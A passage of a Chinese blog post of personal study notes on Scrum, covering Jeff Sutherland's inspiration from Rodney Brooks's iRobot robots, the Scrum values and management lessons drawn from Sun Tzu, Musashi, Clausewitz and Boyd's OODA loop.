YaHei&#34;;font-size:11.0pt;" lang="zh-CN">年，通过</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">大型机、大型数据库来造机器人，都失败了</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">只有传感器、没有数据库，根据</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">传感器的</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">实时数据响应</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">没有</span><span style="font-family:Calibri;font-size:11.0pt;">CPU</span><span style="font-family:微软雅黑;font-size:11.0pt;">，每个脚都是独立的处理器</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">脑子里有神经网络芯片，初始化是空白的</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">机器人一开始像团面条，</span><span style="font-family:Calibri;font-size:11.0pt;" lang="en-US">30</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;" lang="zh-CN">秒后</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">慢慢地像小孩一样，</span><span style="font-family:Calibri;font-size:11.0pt;" lang="en-US">3</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;" lang="zh-CN">分钟</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">会学习走路，之后可以跑</span></p></li></ul><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">Jeff</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">问教授，类比</span></p></li><ul type="disc" style="direction: ltr;unicode-bidi: embed;margin-top: 0in;margin-bottom: 0in;list-style-type: square;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">传统上，有大型项目，每个开发者都很慢</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">Jeff</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">提问，是否可以给开发人员简单的规则，他们自组织，可否在</span><span style="font-family:Calibri;font-size:11.0pt;" lang="en-US">1</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;" lang="zh-CN">周内形成</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">形成高效团队</span></p></li></ul></ul><ul type="circle" style="direction:ltr;unicode-bidi:embed;margin-top:0in;margin-bottom:0in;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:red;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">基于这个思想，就是</span><span style="font-family:Calibri;font-size:11.0pt;">SCRUM</span></p></li></ul><li style="margin-top: 0px;margin-bottom: 0px;vertical-align: middle;font-weight: bold;"><p><strong><span style="font-family:微软雅黑;font-size:11.0pt;">3 跨学科团队</span></strong></p></li></ul><p style="margin-right: 0in;margin-left: 0.375in;font-family: 微软雅黑;font-size: 11pt;">孤立的活动，缺乏透明度，将使其陷入困境</p><p style="margin-right: 0in;margin-left: 0.375in;font-family: 微软雅黑;font-size: 11pt;color: red;">【思】隔绝自己，将自绝了未来，要勇敢走出去，和他人需求结合在一起，和各类不同的人员打交道，开放，透明</p><ul type="disc" style="direction: ltr;unicode-bidi: embed;list-style: none;" class="list-paddingleft-1"><li style="margin-top: 0px;margin-bottom: 0px;vertical-align: middle;font-weight: bold;"><p><strong><span style="font-family:微软雅黑;font-size:11.0pt;">4 新兴做法</span></strong></p></li></ul><p style="margin-right: 0in;margin-left: 0.375in;font-family: 微软雅黑;font-size: 11pt;">如果你无法移除障碍，就无法摆脱平庸的人<span style="color:red;">【思】开辟新赛道，突变、创新，培育能发挥特长的环境，才能摆脱平庸的人。如柯文哲仙人掌语，仙人掌在热带也能长好，但是拼不过其他植物，在沙漠可以。</span></p><ul type="disc" style="direction: ltr;unicode-bidi: embed;list-style: none;" class="list-paddingleft-1"><li style="margin-top: 0px;margin-bottom: 0px;vertical-align: middle;font-weight: bold;"><p><strong><span style="font-family:微软雅黑;font-size:11.0pt;">5 成果只能在实践中产生</span></strong></p></li></ul><p style="margin-right: 0in;margin-left: 0.375in;font-family: 微软雅黑;font-size: 11pt;">经验性过程，需要监视和调整，需要批判性思维。<span style="color:red;">【思】到底有哪些传统的做法不再有效？早点承认失败，改弦易辙，才是上策</span>。</p><ul type="disc" style="direction: ltr;unicode-bidi: embed;list-style: none;" class="list-paddingleft-1"><li style="margin-top: 0px;margin-bottom: 0px;vertical-align: middle;font-weight: bold;"><p><strong><span style="font-family:微软雅黑;font-size:11.0pt;">6 团队绩效大于个人综合</span></strong></p></li></ul><p style="margin-right: 0in;margin-left: 0.375in;font-family: 微软雅黑;font-size: 11pt;">能在更短的时间内以更低的成本生产出更多的产品、具有更高的质量，更高的客户满意度，为客户和产品提供更好的产品。</p><p><br/></p><table cellpadding="0" cellspacing="0" valign="top" title="" summary="" style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><tbody style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><tr style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><td style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;" width="652.3333333333334"><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span style="font-size: 12px;">Rodney
  Brooks是机器人领域的领先专家之一，为自主机器人产品的开发做出了重大贡献。他的一个关键成就是iRobot的自主家用清洁机器人Roomba的开发。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span style="font-size: 12px;">Roomba的自主性是通过传感器、人工智能和高级算法的组合实现的。该机器人使用多种传感器，包括红外线传感器和碰撞传感器，以便在移动时检测障碍物并避免碰撞。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span style="font-size: 12px;">此外，Roomba的高级算法使其能够绘制出周围环境的地图，并计算出清洁房间的最有效路径。这使得Roomba可以在不需要人的干预下自主地彻底清洁房间。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span style="font-size: 12px;">Brooks开发自主机器人的方法基于行为式机器人技术的原则。这种方法强调设计能够与环境互动并从经验中学习的机器人的重要性。通过专注于机器人的行为和互动，而不是试图编程它们执行特定任务，Brooks已经能够开发更灵活和适应性更强的自主系统。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span style="font-size: 12px;">总体而言，Rodney
  Brooks在使iRobot的Roomba和其他机器人产品自主方面的成功证明了他在机器人领域的专业知识和解决问题的创新方法。他的工作为自主机器人领域的进一步发展铺平了道路。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><cite style="margin:0in;font-family:Calibri;font-size:9.0pt;color:#595959;"><span style="font-size: 12px;"> </span></cite></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;" lang="en-US"><span style="font-size: 12px;">---</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span style="font-size: 12px;">Rodney
  Brooks的自主iRobot产品和预编程机器人之间设计思维方式的主要区别在于它们处理机器人自主性问题的方法。预编程机器人被设计用于执行特定任务，它们的行为由一组预定义的指令确定。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span style="font-size: 12px;"> </span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span style="font-size: 12px;">相反，Rodney
  Brooks设计自主机器人的方法基于行为式机器人技术的原则。这种方法强调设计能够与环境互动并从经验中学习的机器人的重要性。这些机器人不是被编程为执行一组固定指令，而是被设计为适应和响应不断变化的情况，使其在功能上更加灵活和多样化。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span style="font-size: 12px;"> </span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span style="font-size: 12px;">像Roomba这样的自主iRobot产品使用传感器、人工智能和高级算法的组合来导航和与其周围环境交互。通过使用传感器检测障碍物并计算完成任务的最有效路径，这些机器人可以在不需要人的干预下自主运行。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span style="font-size: 12px;"> </span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span style="font-size: 12px;">总体而言，Rodney
  Brooks的自主iRobot产品和预编程机器人之间的设计思维方式的主要区别在于它们对灵活性和适应性的重视。虽然预编程机器人被设计用于执行特定任务，但自主机器人被设计为学习和适应不同的环境，使其在更广泛的应用中更加灵活和有用。</span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;" lang="en-US"><span style="font-size: 12px;"> </span></p></td></tr></tbody></table><p><br/></p><table cellpadding="0" cellspacing="0" valign="top" title="" summary="" style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><tbody style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><tr style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><td style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;" width="652.3333333333334"><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="yo">Jeff
  Sutherland表示，Scrum的创立受到了iRobot自主机器人的启发。据Sutherland称，他对iRobot机器人适应并响应其环境变化的能力印象深刻，并看到了这种方法和敏捷软件开发原则之间的相似之处。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="yo"> </span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="yo">特别是，Sutherland被iRobot机器人使用反馈循环不断评估和响应其周围环境的方式所震撼。这种方法与他关于迭代式开发、频繁测试和持续改进的思想相吻合。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="yo"> </span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="yo">Sutherland还指出，iRobot采用敏捷方法在公司的成功中扮演了一定角色。通过采用协作、灵活性和快速迭代等敏捷原则，iRobot能够开发出更加贴近客户需求并能够更快地上市的产品。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="yo"> </span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="yo">总体而言，iRobot自主机器人如何激发Scrum创立的故事凸显了跨学科学习的重要性和从其他领域获得灵感的价值。它也强调了在软件开发和其他领域采用敏捷方法的潜在好处。</span></p></td></tr></tbody></table><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5607476635514018" data-s="300,640" style="height: auto !important;" data-type="png" data-w="856" src="https://wechat2rss.xlab.app/img-proxy/?k=284f8d2f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FFStUibflSINzTqZKgnKiact2CqnzHYQYb8cOhe8SHMhjjYjkCcdWkO5QL6cp5yrWWfXwX0uPHSpKpJK3kBnAUVLw%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="color: rgb(20, 50, 77);font-family: 微软雅黑;font-size: 16pt;">启发敏捷的</span><span style="color: rgb(20, 50, 77);font-family: 微软雅黑;font-size: 16pt;">文学作品</span><br/></p><p><span style="color: rgb(20, 50, 77);font-family: 微软雅黑;font-size: 11pt;">敏捷是不同的，你必须重新定位领导的角色，必须解决根本的问题</span></p><p><span lang="zh-CN" style="color: rgb(46, 117, 181);font-size: 14pt;font-family: 微软雅黑;">问题：</span><span lang="en-US" style="color: rgb(46, 117, 181);font-size: 14pt;font-family: Calibri;">30</span><span lang="en-US" style="color: rgb(46, 117, 181);font-size: 14pt;font-family: &#34;Microsoft YaHei&#34;;">%</span><span lang="zh-CN" style="color: rgb(46, 117, 181);font-size: 14pt;font-family: &#34;Microsoft YaHei&#34;;">的同事不愿意被改变</span></p><ul type="disc" style="direction: ltr;unicode-bidi: embed;list-style: none;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">为</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">GE Power</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">的管理层做培训，培训</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">50</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">个管理层，傍晚</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">Jeff</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">和高管散步时，说：你知道么？你的</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">3</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">0%的</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">经理</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">不想改变</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">，他们将抵制你。你要怎么做呢？你需要策略，不炒掉他们，还能解决问题。</span></p></li><ul type="disc" style="direction:ltr;unicode-bidi:embed;margin-top:0in;margin-bottom:0in;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">在被抵制的情况下，怎么推动变革</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">Jeff</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">：要学孙子，不战而屈人之兵</span></p></li></ul><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN"></span></p><p><span style="font-size: 14pt;color: rgb(39, 98, 150);font-family: 微软雅黑;">问题：短期的紧急情况，削弱了你的长期战略</span></p><p><span style="font-family: 微软雅黑;font-size: 11pt;">忙于灭火，不灭火不行。光灭火，没有长期战略，忽视了目标，也不行。</span><span style="font-family: 微软雅黑;font-size: 11pt;">既要埋头拉车，也要抬头看路。</span></p><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">宫本武藏</span></p></li><ul type="circle" style="direction:ltr;unicode-bidi:embed;margin-top:0in;margin-bottom:0in;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">长短剑结合，没有啥区别</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">短剑帮助长剑，要有战略思维</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">短期是帮助长期的战略</span></p></li></ul><p><span style="font-family:微软雅黑;font-size:11.0pt;"></span></p><p><span style="color: rgb(39, 98, 150);font-family: 微软雅黑;font-size: 14pt;">问题：当事情出错时，会责怪别人</span></p><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">冯 克劳塞维茨</span></p></li><ul type="circle" style="direction:ltr;unicode-bidi:embed;margin-top:0in;margin-bottom:0in;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">他们错了！自己错了就掩盖。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">拨开战争的迷雾，&#34;战争迷雾&#34;
      指的是影响军事行动决策的不确定性、混乱和缺乏知识。它表明，尽管进行了仔细的规划和准备，但总会有不可预测的因素会影响战斗或战役的结果。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">从混乱不堪中看到现实，很多人不明不白就被干掉了，被炒掉了</span></p></li></ul><p><span style="font-family:微软雅黑;font-size:11.0pt;"><br/></span></p><p><span style="font-family:微软雅黑;font-size:11.0pt;"></span><span style="color: rgb(39, 98, 150);font-family: &#34;Microsoft YaHei&#34;;font-size: 14pt;">问题：应对对立力量的快速反应，保证了成功</span></p><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:Calibri;font-size:11.0pt;">Colonel </span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">John Boyd</span></p></li><ul type="circle" style="direction:ltr;unicode-bidi:embed;margin-top:0in;margin-bottom:0in;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:Calibri;font-size:11.0pt;">OODA</span><span style="font-family:微软雅黑;font-size:11.0pt;">情境意识，高度机动能力</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">想干点啥，都会被反对时</span></p></li><ul type="disc" style="direction: ltr;unicode-bidi: embed;margin-top: 0in;margin-bottom: 0in;list-style-type: square;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">认识到现实</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">和情况</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">，要快速行动，</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">fast t</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">ransition，</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">让反对力量感到困惑，因为你是从另外的方向应对的</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">。对方困惑的原因是：对方认为现实中，你应该是从东边来，而你突然从西边出现，他们需要</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">complete change</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">才能应对你</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">打开了缓冲空间，</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">agile window</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">，</span><span style="font-family:微软雅黑;font-size:11.0pt;color:red;" lang="zh-CN">在别人重新布阵堵死你之前，打开好多窗户，有了高度机动能力，这是一种很重要的敏捷思维。【思】数字化降维打击也在于此</span></p></li></ul></ul></ul><p><br/></p><table cellpadding="0" cellspacing="0" valign="top" title="" summary=""><tbody><tr><td style="border-style: solid;border-color: rgb(163, 163, 163);border-width: 1pt;background-color: rgb(231, 231, 231);vertical-align: top;padding: 4pt;" width="652.3333333333334"><p style="margin:0in;font-family:微软雅黑;font-size:11.0pt;"><span style="font-size: 12px;">OODA（观察、定位、决策、行动）是由美国军事战略家和理论家约翰·博伊德（John
  Boyd）开发的决策模型。OODA态势感知指的是个人或组织有效观察、定位自己环境、基于信息做出决策并及时采取适当行动的能力。它强调了迅速准确评估情况、适应不断变化的环境以及保持领先于对手或竞争对手的重要性。</span></p><p style="margin:0in;font-family:微软雅黑;font-size:11.0pt;color:black;"><span style="font-size: 12px;"> </span></p><p style="margin:0in;font-family:微软雅黑;font-size:11.0pt;color:black;"><span style="font-size: 12px;">OODA模型包含以下四个步骤：</span></p><p><span style="font-family: 微软雅黑;font-size: 12px;">观察（Observe）：收集有关当前情况的信息，包括来自外部环境和内部环境的数据。</span></p><p><span style="font-family: 微软雅黑;font-size: 12px;">定位（Orient）：将观察到的信息与已有的知识和经验相结合，形成对当前情况的理解和认知框架。</span></p><p><span style="font-family: 微软雅黑;font-size: 12px;">决策（Decide）：基于形成的认知框架，做出决策以应对当前情况。这可以涉及对多种选择进行考虑，评估每个选择的风险和潜在结果。</span></p><p><span style="font-family: 微软雅黑;font-size: 12px;">行动（Act）：采取行动执行所做的决策，并监控行动的结果以及可能需要调整的情况。</span></p><p style="margin:0in;font-family:微软雅黑;font-size:11.0pt;color:black;"><span style="font-size: 12px;">这些步骤不是线性的，而是循环的，并且需要不断地观察、定位、决策和行动来应对不断变化的情况。</span></p></td></tr></tbody></table><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5641931684334511" data-s="300,640" style="height: auto !important;" data-type="png" data-w="849" src="https://wechat2rss.xlab.app/img-proxy/?k=84a965e6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FFStUibflSINzTqZKgnKiact2CqnzHYQYb8SFYuoE4nLXVB1egzeTdOXwzK1V51QPjzaS1ibJQoOSmic3oZusQxZKpQ%2F640%3Fwx_fmt%3Dpng"/></p><h1 style="margin:0in;font-family:微软雅黑;font-size:16.0pt;color:#14324D;">践行<span lang="en-US" style="font-size: 16pt;">SCRUM</span><span lang="zh-CN" style="font-size: 16pt;">价值观</span></h1><p style="margin-right: 0in;margin-left: 0in;font-size: 11pt;"><span style="font-family:微软雅黑;" lang="zh-CN">干好</span><span style="font-family:Calibri;" lang="en-US">SCRUM</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">，前提是掌握所有的信息</span></p><ul type="disc" style="direction: ltr;unicode-bidi: embed;list-style: none;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">1 Openess</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">，</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">开放</span></p></li><ul type="circle" style="direction:ltr;unicode-bidi:embed;margin-top:0in;margin-bottom:0in;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">每个人都清楚所有的情况，才能做出更好的决策。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">在敏捷的环境中，每个人都是</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">leader</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">，都要指导现实</span></p></li><ul type="disc" style="direction: ltr;unicode-bidi: embed;margin-top: 0in;margin-bottom: 0in;list-style-type: square;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">开发人员寻找技术方案</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:Calibri;font-size:11.0pt;" lang="en-US">SM</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;" lang="zh-CN">为服务团队，教练团队</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;" lang="en-US">PO</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;" lang="zh-CN">也是</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;" lang="en-US">leader</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;" lang="zh-CN">经理变为</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;" lang="en-US">leadership</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;" lang="zh-CN">，设置愿景和目标</span></p></li></ul></ul><ul type="circle" style="direction:ltr;unicode-bidi:embed;margin-top:0in;margin-bottom:0in;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:red;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">【思】</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US"> </span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">信息权力的影响在减弱，边缘化或排挤一个人变得越来越不可能，微观管理倾向的经理需要开放、民主</span></p></li></ul><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">2 respect </span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">尊重</span></p></li><ul type="circle" style="direction:ltr;unicode-bidi:embed;margin-top:0in;margin-bottom:0in;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">需要尊重才能听到每一个人的声音，搜集到真实的信息</span></p></li></ul><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">3 courage </span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">勇气</span></p></li><ul type="circle" style="direction:ltr;unicode-bidi:embed;margin-top:0in;margin-bottom:0in;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">想获得真实的数据，就必须勇于发生，这需要冒一定的风险，需要勇气</span></p></li></ul><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">4 focus </span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">专注</span></p></li><ul type="circle" style="direction:ltr;unicode-bidi:embed;margin-top:0in;margin-bottom:0in;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">当每个人了解到问题时，他们才能集中精力制定一个解决方案</span></p></li></ul><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">5 commitment </span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">承诺</span></p></li><ul type="circle" style="direction:ltr;unicode-bidi:embed;margin-top:0in;margin-bottom:0in;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">当所有人都同意一个共同的解决方案，承诺就会随之而来</span></p></li></ul></ul><p><br/></p><table cellpadding="0" cellspacing="0" valign="top" title="" summary=""><tbody><tr><td style="border-style: solid;border-color: rgb(163, 163, 163);border-width: 1pt;background-color: rgb(231, 231, 231);vertical-align: top;padding: 4pt;" width="652.3333333333334"><p style="margin:0in;font-size:11.0pt;color:black;"><span style="font-size: 12px;"><span style="font-family: &#34;微软雅黑 Light&#34;;">约翰迪尔（</span><span style="font-family: Calibri;">John Deere</span><span style="font-family: &#34;微软雅黑 Light&#34;;">）是一家领先的农业设备制造商，他们采用敏捷方法论来改进产品开发流程，提高协作、加快创新速度和缩短上市时间。通过采用敏捷方法，约翰迪尔能够打破不同部门之间的隔阂，培养跨职能团队合作和以客户为中心的文化。</span></span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span style="font-size: 12px;"> </span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;color:black;"><span style="font-size: 12px;">约翰迪尔敏捷实施的成功案例包括：</span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span style="font-size: 12px;"> </span></p><ul type="disc" style="direction:ltr;unicode-bidi:embed;margin-top:0in;margin-bottom:0in;" class="list-paddingleft-1"><li style="margin-top: 0px;margin-bottom: 0px;vertical-align: middle;color: black;font-size: 12px;"><p><span style="font-family: &#34;微软雅黑 Light&#34;;font-size: 12px;">更快的上市时间：采用敏捷方法，约翰迪尔能够更快地开发和推出新产品，从而缩短了产品上市时间。</span></p></li></ul><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span style="font-size: 12px;"> </span></p><ul type="disc" style="direction:ltr;unicode-bidi:embed;margin-top:0in;margin-bottom:0in;" class="list-paddingleft-1"><li style="margin-top: 0px;margin-bottom: 0px;vertical-align: middle;color: black;font-size: 12px;"><p><span style="font-family: &#34;微软雅黑 Light&#34;;font-size: 12px;">提高协作：敏捷鼓励不同团队之间的沟通和协作，这导致了更高的效率和更好的问题解决能力。</span></p></li></ul><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span style="font-size: 12px;"> </span></p><ul type="disc" style="direction:ltr;unicode-bidi:embed;margin-top:0in;margin-bottom:0in;" class="list-paddingleft-1"><li style="margin-top: 0px;margin-bottom: 0px;vertical-align: middle;color: black;font-size: 12px;"><p><span style="font-family: &#34;微软雅黑 Light&#34;;font-size: 12px;">增强客户满意度：通过更加关注客户需求和反馈，约翰迪尔能够提供更好地满足客户期望的产品。</span></p></li></ul><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span style="font-size: 12px;"> </span></p><ul type="disc" 